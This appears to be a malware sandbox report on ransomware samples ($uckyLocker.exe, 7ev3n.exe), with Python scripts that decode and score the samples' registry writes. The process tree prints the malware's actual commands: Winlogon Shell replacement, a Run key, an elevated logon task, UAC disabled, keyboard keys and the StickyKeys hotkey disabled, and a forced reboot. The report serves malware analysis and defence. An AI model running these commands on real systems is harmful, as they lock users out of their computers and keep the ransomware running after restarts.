C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1872 /prefetch:12⤵PID:644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5096 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:1580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3856 /prefetch:82⤵PID:784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1080 /prefetch:12⤵PID:1520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3384 /prefetch:82⤵PID:1168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4788 /prefetch:82⤵PID:3196
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4636
-
-
Level 2: C:\Users\Admin\Downloads\$uckyLocker.exe
Command line: "C:\Users\Admin\Downloads\$uckyLocker.exe"
- Executes dropped EXE
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID: 920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:12⤵PID:4144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4140 /prefetch:82⤵PID:1188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5820 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1680
-
-
C:\Users\Admin\Downloads\7ev3n.exe"C:\Users\Admin\Downloads\7ev3n.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- NTFS ADS
PID:5088 -
C:\Users\Admin\AppData\Local\system.exe"C:\Users\Admin\AppData\Local\system.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4820 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat4⤵
- System Location Discovery: System Language Discovery
PID:1884
-
-
C:\Windows\SysWOW64\SCHTASKS.exeC:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3396
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:644⤵
- System Location Discovery: System Language Discovery
PID:4184 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:645⤵
- Modifies WinLogon for persistence
- System Location Discovery: System Language Discovery
PID:2520
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:644⤵
- System Location Discovery: System Language Discovery
PID:796 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:645⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4496
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:644⤵
- System Location Discovery: System Language Discovery
PID:3624 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:645⤵
- System Location Discovery: System Language Discovery
PID:216
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:644⤵
- System Location Discovery: System Language Discovery
PID:2516 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:645⤵
- System Location Discovery: System Language Discovery
PID:1780
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:644⤵
- System Location Discovery: System Language Discovery
PID:5096 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:645⤵
- System Location Discovery: System Language Discovery
PID:1608
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:644⤵
- System Location Discovery: System Language Discovery
PID:3360 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:645⤵
- UAC bypass
- System Location Discovery: System Language Discovery
PID:1508
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:644⤵
- System Location Discovery: System Language Discovery
PID:2528 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:645⤵
- System Location Discovery: System Language Discovery
PID:3208
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c shutdown -r -t 10 -f4⤵
- System Location Discovery: System Language Discovery
PID:1316 -
C:\Windows\SysWOW64\shutdown.exeshutdown -r -t 10 -f5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2060
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4820
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3564
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /01⤵PID:4132
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3881055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:968
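The two keyboard-related writes in the 7ev3n.exe subtree (the Scancode Map blob and the StickyKeys Flags string) say far more once decoded than the raw command lines do. The following is an added example, not part of the sandbox report: it parses both values exactly as they appear in the reg.exe command lines above. The scancode name table, the SKF_* bit names (from winuser.h) and the assumed stock StickyKeys default of 510 are this example's own, not data from the report.

```python
"""Decode the keyboard-lockout registry values written by 7ev3n.exe.

Added example: not part of the sandbox report. SCANCODE_MAP_HEX and
STICKYKEYS_FLAGS are the exact /d arguments from the reg.exe command
lines in the process tree; the scancode name table, the SKF_* constants
and the assumed StickyKeys default (510) are this example's own.
"""
import struct

# PS/2 set-1 make codes for the keys this sample touches. Extended keys
# carry the 0xE0 prefix in the high byte of the little-endian 16-bit word.
SCANCODE_NAMES = {
    0x0001: "Esc", 0x000F: "Tab", 0x001C: "Enter", 0x001D: "Left Ctrl",
    0x0036: "Right Shift", 0x0038: "Left Alt", 0x003B: "F1", 0x003D: "F3",
    0x003E: "F4", 0x0044: "F10", 0x0045: "Num Lock", 0xE01D: "Right Ctrl",
    0xE038: "Right Alt", 0xE05B: "Left Win", 0xE05C: "Right Win",
    0xE05D: "Apps (menu)",
}

# /d argument of: REG ADD "...\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY
SCANCODE_MAP_HEX = (
    "00000000000000001700000000003800000038e000005be000005ce00000360000001d00"
    "00001de000000f000000010000001c0000003e0000003b00000044000000450000003d00"
    "00005de000000000"
)
# /d argument of: REG ADD "HKCU\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ
STICKYKEYS_FLAGS = "506"


def decode_scancode_map(blob: bytes) -> dict:
    """Parse a kbdclass Scancode Map: u32 version, u32 flags, u32 entry count
    (meant to include the all-zero terminator), then 4-byte entries laid out
    as <target u16 LE><source u16 LE>. A target of 0 disables the source key."""
    if len(blob) < 12 or len(blob) % 4:
        raise ValueError("Scancode Map length must be >= 12 and a multiple of 4")
    version, flags, declared = struct.unpack_from("<III", blob, 0)
    entries = [struct.unpack_from("<HH", blob, off) for off in range(12, len(blob), 4)]
    mappings = []
    for target, source in entries:
        if target == 0 and source == 0:
            break  # terminator entry
        mappings.append({
            "source": source,
            "source_name": SCANCODE_NAMES.get(source, f"0x{source:04X}"),
            "target": target,
            "action": "disabled" if target == 0 else f"remapped to 0x{target:04X}",
        })
    return {
        "version": version,
        "flags": flags,
        "declared_entries": declared,
        "actual_entries": len(entries),              # includes the terminator
        "count_mismatch": declared != len(entries),  # worth flagging during triage
        "mappings": mappings,
    }


# SKF_* bit values from winuser.h (STICKYKEYS.dwFlags); the REG_SZ "Flags"
# value is the same bitmask written out as decimal text.
SKF_BITS = {
    0x001: "SKF_STICKYKEYSON", 0x002: "SKF_AVAILABLE", 0x004: "SKF_HOTKEYACTIVE",
    0x008: "SKF_CONFIRMHOTKEY", 0x010: "SKF_HOTKEYSOUND", 0x020: "SKF_INDICATOR",
    0x040: "SKF_AUDIBLEFEEDBACK", 0x080: "SKF_TRISTATE", 0x100: "SKF_TWOKEYSOFF",
}
STICKYKEYS_DEFAULT = 510  # assumed stock Windows 10 value (0x1FE)


def decode_stickykeys_flags(value: str, baseline: int = STICKYKEYS_DEFAULT) -> dict:
    """Name the SKF_* bits set in a StickyKeys Flags string, and the bits that
    are set in the baseline but cleared in the sample's value."""
    flags = int(value, 10)
    return {
        "value": flags,
        "set": [name for bit, name in SKF_BITS.items() if flags & bit],
        "cleared_vs_baseline": [name for bit, name in SKF_BITS.items()
                                if (baseline & bit) and not (flags & bit)],
    }


def disabled_keys(blob: bytes) -> list:
    """Names of every key the map turns off, in map order."""
    return [m["source_name"] for m in decode_scancode_map(blob)["mappings"]
            if m["action"] == "disabled"]


if __name__ == "__main__":
    blob = bytes.fromhex(SCANCODE_MAP_HEX)
    info = decode_scancode_map(blob)
    print(f"declared {info['declared_entries']} entries, found {info['actual_entries']}"
          f"{' (MISMATCH)' if info['count_mismatch'] else ''}")
    for m in info["mappings"]:
        print(f"  {m['source_name']:<12} {m['action']}")
    sk = decode_stickykeys_flags(STICKYKEYS_FLAGS)
    print("StickyKeys bits cleared vs baseline:", ", ".join(sk["cleared_vs_baseline"]))
```

Decoded, the map disables sixteen keys with no remapping at all: both Alt, both Win, both Ctrl, Right Shift, Tab, Esc, Enter, F1, F3, F4, F10, Num Lock and the Apps key. That removes Ctrl+Shift+Esc, Ctrl+Alt+Del, Alt+Tab, Alt+F4 and the Win key, which is what turns the replaced Winlogon Shell into a lock screen the user cannot escape from the keyboard. Two details matter for triage: the header declares 0x17 (23) entries but only 17 are present, so a strict parser should treat the blob as malformed rather than trust the count; and Flags=506 differs from the assumed default 510 only in SKF_HOTKEYACTIVE, i.e. it switches off the press-Shift-five-times hotkey so the StickyKeys prompt cannot be used to get a window on top of the lock screen.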
Network

MITRE ATT&CK Enterprise v15
(the number in parentheses is how many sandbox signatures mapped to each technique)

Persistence
  Boot or Logon Autostart Execution, T1547 (2)
    Registry Run Keys / Startup Folder, T1547.001 (1)
    Winlogon Helper DLL, T1547.004 (1)
  Scheduled Task/Job, T1053 (1)
    Scheduled Task, T1053.005 (1)

Privilege Escalation
  Abuse Elevation Control Mechanism, T1548 (1)
    Bypass User Account Control, T1548.002 (1)
  Boot or Logon Autostart Execution, T1547 (2)
    Registry Run Keys / Startup Folder, T1547.001 (1)
    Winlogon Helper DLL, T1547.004 (1)
  Scheduled Task/Job, T1053 (1)
    Scheduled Task, T1053.005 (1)

Defense Evasion
  Abuse Elevation Control Mechanism, T1548 (1)
    Bypass User Account Control, T1548.002 (1)
  Impair Defenses, T1562 (1)
    Disable or Modify Tools, T1562.001 (1)
  Modify Registry, T1112 (4)
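The technique counts above are produced by the sandbox's own signature set. As an added example (not part of the report), here is a small triage routine that derives the same kind of mapping directly from the REG ADD and SCHTASKS command lines in the 7ev3n.exe subtree: it tokenises each command, pulls out the key, value, data and the /reg:64 view, and scores it against a handful of rules. The command lines are copied from the process tree; the rules, severities and technique assignments are this example's own assumptions and include a benign Winlogon Shell=explorer.exe case to show the rule does not fire on the default.

```python
"""Map the 7ev3n persistence commands onto ATT&CK sub-techniques.

Added example: not part of the sandbox report. COMMANDS are the reg.exe and
SCHTASKS.exe command lines copied from the process tree; the parser, the
rule set, the severities and the technique IDs are this example's own.
"""
import re

COMMANDS = [
    r'C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f',
    r'REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64',
    r'REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64',
    r'REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64',
    r'REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64',
    r'REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64',
    r'REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64',
    r'REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64',
]


def tokenize(cmd: str) -> list:
    """Split a Windows command line on whitespace, keeping quoted arguments whole.
    (shlex in POSIX mode would eat the backslashes in registry paths.)"""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]


def parse_reg_add(tokens: list) -> dict:
    """Extract key, value name, type, data and the /reg:32|64 view from REG ADD."""
    op = {"key": tokens[2], "value": None, "type": None, "data": None, "view": None}
    names = {"/v": "value", "/t": "type", "/d": "data"}
    i = 3
    while i < len(tokens):
        t = tokens[i].lower()
        if t in names and i + 1 < len(tokens):
            op[names[t]] = tokens[i + 1]
            i += 2
        else:
            if t.startswith("/reg:"):
                op["view"] = t.split(":", 1)[1]
            i += 1
    return op


def assess_reg(op: dict) -> tuple:
    """Return (severity, ATT&CK technique, explanation) for one registry write."""
    key, name = op["key"].lower(), (op["value"] or "").lower()
    data = op["data"] or ""
    user_writable = "\\appdata\\" in data.lower()
    if (key.endswith(r"windows nt\currentversion\winlogon") and name == "shell"
            and data.lower() != "explorer.exe"):
        return "high", "T1547.004", f"Winlogon Shell replaced with {data}"
    if key.endswith(r"windows\currentversion\run"):
        return (("high" if user_writable else "medium"), "T1547.001",
                f"Run key {op['value']} -> {data}")
    if key.endswith(r"control\keyboard layout") and name == "scancode map":
        return "high", "T1112", "Scancode Map set: keys remapped/disabled from next logon"
    if key.endswith(r"policies\system") and name == "enablelua" and data == "0":
        return "high", "T1548.002", "EnableLUA=0: UAC prompts off after reboot"
    if key.endswith(r"accessibility\stickykeys") and name == "flags":
        return "medium", "T1112", f"StickyKeys Flags={data} (accessibility hotkey tampering)"
    return "low", "T1112", f"custom value {op['value']}={data} under {op['key']}"


def assess_schtasks(tokens: list) -> tuple:
    """Score a SCHTASKS /create: elevated task pointing into a user-writable path."""
    opts, i = {}, 1
    while i < len(tokens):
        t = tokens[i].lower()
        if t in ("/sc", "/tn", "/tr", "/rl") and i + 1 < len(tokens):
            opts[t] = tokens[i + 1]
            i += 2
        else:
            i += 1
    elevated = opts.get("/rl", "").upper() == "HIGHEST"
    user_writable = "\\appdata\\" in opts.get("/tr", "").lower()
    sev = "high" if elevated and user_writable else "medium"
    return sev, "T1053.005", (f"task '{opts.get('/tn')}' runs {opts.get('/tr')} "
                              f"on {opts.get('/sc')} with /RL {opts.get('/rl')}")


def triage(commands: list) -> list:
    findings = []
    for n, cmd in enumerate(commands):
        toks = tokenize(cmd)
        if len(toks) > 2 and toks[0].upper() == "REG" and toks[1].upper() == "ADD":
            op = parse_reg_add(toks)
            sev, tech, why = assess_reg(op)
            findings.append({"n": n, "severity": sev, "technique": tech,
                             "detail": why, "view": op["view"]})
        elif (len(toks) > 1 and toks[0].lower().endswith("schtasks.exe")
              and toks[1].lower() == "/create"):
            sev, tech, why = assess_schtasks(toks)
            findings.append({"n": n, "severity": sev, "technique": tech,
                             "detail": why, "view": None})
    return findings


if __name__ == "__main__":
    for f in triage(COMMANDS):
        print(f"[{f['severity']:<6}] {f['technique']:<9} {f['detail']}")
```

Run against the eight command lines this yields five high findings (the ONLOGON task with /RL HIGHEST, the Shell replacement, the Run key into AppData, the Scancode Map and EnableLUA=0), one medium (StickyKeys) and two low ones for the rgd_bcd_condition and crypted markers, which no generic rule covers and which are worth keeping as family-specific indicators rather than dropping.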
Downloads

Filesize 9.1MB
  MD5     64261d5f3b07671f15b7f10f2f78da3f
  SHA1    d4f978177394024bb4d0e5b6b972a5f72f830181
  SHA256  87f51b4632c5fbc351a59a234dfefef506d807f2c173aac23162b85d0d73c2ad
  SHA512  3a9ff39e6bc7585b0b03f7327652e4c3b766563e8b183c25b6497e30956945add5684f1579862117e44c6bac2802601fc7c4d2a0daa1824f16c4da1fd6c9c91a

Filesize 56KB
  MD5     b635f6f767e485c7e17833411d567712
  SHA1    5a9cbdca7794aae308c44edfa7a1ff5b155e4aa8
  SHA256  6838286fb88e9e4e68882601a13fa770f1b510a0a86389b6a29070a129bf2e5e
  SHA512  551ba05bd44e66685f359802b35a8c9775792a12844906b4b53e1a000d56624c6db323754331c9f399072790991c1b256d9114a50fb78111652a1c973d2880af

Filesize 1KB
  MD5     2d2a235f1b0f4b608c5910673735494b
  SHA1    23a63f6529bfdf917886ab8347092238db0423a0
  SHA256  c897436c82fda9abf08b29fe05c42f4e59900116bbaf8bfd5b85ef3c97ab7884
  SHA512  10684245497f1a115142d49b85000075eb36f360b59a0501e2f352c9f1d767c447c6c44c53a3fb3699402a15a8017bdbd2edd72d8599fdd4772e9e7cb67f3086

Filesize 152B
  MD5     ff63763eedb406987ced076e36ec9acf
  SHA1    16365aa97cd1a115412f8ae436d5d4e9be5f7b5d
  SHA256  8f460e8b7a67f0c65b7248961a7c71146c9e7a19772b193972b486dbf05b8e4c
  SHA512  ce90336169c8b2de249d4faea2519bf7c3df48ae9d77cdf471dd5dbd8e8542d47d9348080a098074aa63c255890850ee3b80ddb8eef8384919fdca3bb9371d9f

Filesize 152B
  MD5     2783c40400a8912a79cfd383da731086
  SHA1    001a131fe399c30973089e18358818090ca81789
  SHA256  331fa67da5f67bbb42794c3aeab8f7819f35347460ffb352ccc914e0373a22c5
  SHA512  b7c7d3aa966ad39a86aae02479649d74dcbf29d9cb3a7ff8b9b2354ea60704da55f5c0df803fd0a7191170a8e72fdd5eacfa1a739d7a74e390a7b74bdced1685

Filesize 18KB
  MD5     2e23d6e099f830cf0b14356b3c3443ce
  SHA1    027db4ff48118566db039d6b5f574a8ac73002bc
  SHA256  7238196a5bf79e1b83cacb9ed4a82bf40b32cd789c30ef790e4eac0bbf438885
  SHA512  165b1de091bfe0dd9deff0f8a3968268113d95edc9fd7a8081b525e0910f4442cfb3b4f5ac58ecfa41991d9dcabe5aa8b69f7f1c77e202cd17dd774931662717

Filesize 414KB
  MD5     c850f942ccf6e45230169cc4bd9eb5c8
  SHA1    51c647e2b150e781bd1910cac4061a2cee1daf89
  SHA256  86e0eac8c5ce70c4b839ef18af5231b5f92e292b81e440193cdbdc7ed108049f
  SHA512  2b3890241b8c8690aab0aed347daa778aba20f29f76e8b79b02953b6252324317520b91ea60d3ef73e42ad403f7a6e0e3f2a057799f21ed447dae7096b2f47d9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize 2KB
  MD5     cf86d60705aa0a36f1a9cc96dd142ac0
  SHA1    d3df2b37fc419ef6a5a2cea4194e6c7919b9e6f3
  SHA256  b0bd5d131f9946cfca7ca612c5a0776c79b4dbe416a3f5ba00c2ff4e3b574486
  SHA512  48d4c789438203befd95e12e6e22cc84fc4edc93c6b6bbc9e42aaba06be0ec4f0a0dc98eb9e81808e38f68dd16563ee2f1907a79176b3f6552e2a16627b3480d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize 2KB
  MD5     68c670ddc19a85d129f259e53558cb70
  SHA1    4e4021d5f919d562c1dbaa070eb17b7463a3b121
  SHA256  ddf0efc554df15f9f090bd700dda1c604ac59fdae32618753a454999b8b7bb77
  SHA512  7786ce347ece4b1d43805395ff8f92044c804da06450e011c47bf05a6f6c60d93938b64acdca5dd55a70aab91856b82d7a44edb60c96bd640dc6e73013c0b76e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize 2KB
  MD5     979805d2d0e9d5b9eb983b3e4c7a2fd9
  SHA1    ba78516282a8ee721396ac63999fd47d77efbb1d
  SHA256  d6947ebaf14e6bbdd79ec6c35463c83f08d69844df4d4492eb1a868e343de496
  SHA512  b05079a71e5752a2c3779fd9c568d7cceae80980703a188b2a7052117c087d7655e63ef824dd5d5e4fde4f1a04f74c0a11dee6f8773da1c7189a19796d98dd60

Filesize 579B
  MD5     e8ca5c2ea3135b76656e6364fa14c986
  SHA1    ecb2dcfd6f4b3ea2230a8f5c5dc2548976670094
  SHA256  9850dfe2408c4815c9759f3e51ae70bce60006ce097cbff642a44a71778bb1cc
  SHA512  4889883256e61bb7311919a11770e3fa7a348d5de43c03a6814f4802080a388a31c353413b3b51b1576808747544b82ae0c14a2007c3d5001a27a236d0e96b94

Filesize 656B
  MD5     ea0a65903aafc683bb3f5dfdcc0bb0ff
  SHA1    5a1d9a764f0413d82253d407ea08526f93966cad
  SHA256  5b1568a4475b62d8459d85e345568e1d1839fe85e7925e7450b30738a6c4c025
  SHA512  237e66970d7fcee9678dabcbf1af7cbcd92325f8e29a118eab0a8a28fd0c9a5e7cb67971a0a0b3d08986900bbec25493b37ed96c8feefa524ee3aac4b9712d9c

Filesize 6KB
  MD5     5469b5fc046b4a131bdbffb5dfd71001
  SHA1    aeda3025d79bf4be48b3bea5c6cce8a8441aac91
  SHA256  773ccdba007602f0f66765d7d8eb302cee9fbf6dfbd8879458f8bf7aef0dd6b4
  SHA512  0586a4ddbbc45850fdacf58c99e4802fcab41da504c0ca3d1f57d8c6e8ccafbc1aa2f7403cca9e2e145d9f753f1c8b9984b6be80dc244c616c28fa8754265b80

Filesize 5KB
  MD5     f59a5e000c5ee7b50d9ae98a0caa84a6
  SHA1    58121b243018b9a63b85396aba7ca1428c188069
  SHA256  3dcd40318435b546522596fd1570008cccec6ce981e55aea05c6d5f43e32e83f
  SHA512  6d5f9c89ad4f3abcea6df85c93761a86311acbee6f31ed74a22ee5b801a5969f8f5116ad8549a3df608be092649503581fa22cda1a70dc5050725a708e883ef9

Filesize 6KB
  MD5     b4317a8555e58e7715e1d44c5eb9d406
  SHA1    8971d078ef7816660cbc55eaa41a2d37ca5a9b43
  SHA256  aa5046792e69977592acb03012a3c9d5561379a1ca71467708b4c4976b3ef7e7
  SHA512  275f02703b35f21a0913a6eaf6d6b68b80f8b8cab3cdff0fa1177f3a1a097c4a537af0578a4e636adb6366e46bd08007abd94c530cec1bbfb2360903f70f9261

Filesize 6KB
  MD5     4723a1036cb9547e87ccb5b72322a2f6
  SHA1    a4d7d2855b7099e9ae45350320e9164ca96a5bb7
  SHA256  2d549994def6a4515637ba1f2dccc59d0282d6f6d32f2f98ad26e4a54946169c
  SHA512  28e79f8bc9b0b6e6ac0b9a3a2abb83fcb67f2078347dbb7c52be8390495b32f4c3aa65e295fea70e732b7bc2154b0c8b3d43b4051f1d6c8d7cfc92ab99f6f8e8

Filesize 1KB
  MD5     4c95bba9bfb40886cfab8e32dfb8843e
  SHA1    b82422701e9344d3cfb646e6f53b0685ce041ab1
  SHA256  89970ef78d8234aeacee10b40533eb4f03782815c8a5b83fcb2483d844e16941
  SHA512  18b5c92d7139d2765f34961e2c3b70a3b73715c317dae621973b21ed855cacee61390cc4548ec24e99200d9d1b01d3e99aa6fb1343c51f075d787b0c937336f4

Filesize 1KB
  MD5     4ebc7f7ccb6543a2d847a20b7c5c51d7
  SHA1    64ab9c6f4f5305aa9fb4a84541c7fa0a184b7560
  SHA256  d21ba07b4e7de249a8a8ac1fd1429e5e7cb949d93407b050bc7d6c54922b4f6e
